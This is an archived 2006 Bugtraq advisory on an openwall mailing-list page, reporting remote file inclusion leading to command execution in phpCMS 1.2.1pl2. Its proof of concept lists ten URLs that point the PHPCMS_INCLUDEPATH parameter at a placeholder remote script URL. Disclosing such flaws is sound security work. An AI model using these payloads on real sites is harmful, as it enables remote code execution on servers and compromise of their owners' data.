lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 12 Jun 2006 10:29:14 +0200
From: Federico Fazzi <federico@...istici.org>
To: secunia-vuln-report <vuln@...unia.com>,
	securiteam <news@...uriteam.com>, bugtraq@...urityfocus.com
Subject: [FSA013] phpCMS 1.2.1pl2, Remote command execution


-----------------------------------------------------
Advisory id: FSA:014

Author:    Federico Fazzi
Date:	   12/06/2006, 10:25
Sinthesis: phpCMS 1.2.1pl2, Remote command execution
Type:	   high
Product:   http://www.phpcms.de/
Patch:	   unavailable
-----------------------------------------------------


1) Description:

Multiple vulnerabilities, see poc.

2) Proof of concept:

http://example/[pc_path]/parser/include/class.parser_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://example/[pc_path]/parser/include/class.session_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://example/[pc_path]/parser/include/class.edit_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://example/[pc_path]/parser/include/class.http_indexer_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://example/[pc_path]/parser/include/class.cache_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://example/[pc_path]/parser/include/class.search_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://example/[pc_path]/parser/include/class.lib_indexer_universal_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://example/[pc_path]/parser/include/class.layout_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://example/[pc_path]/parser/plugs/counter.php?PHPCMS_INCLUDEPATH=[cmd_url]

http://example/[pc_path]/parser/parser.php?PHPCMS_INCLUDEPATH=[cmd_url]/
(note this is with final slash (/))

3) Solution:

sanitized all variables on all files.



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ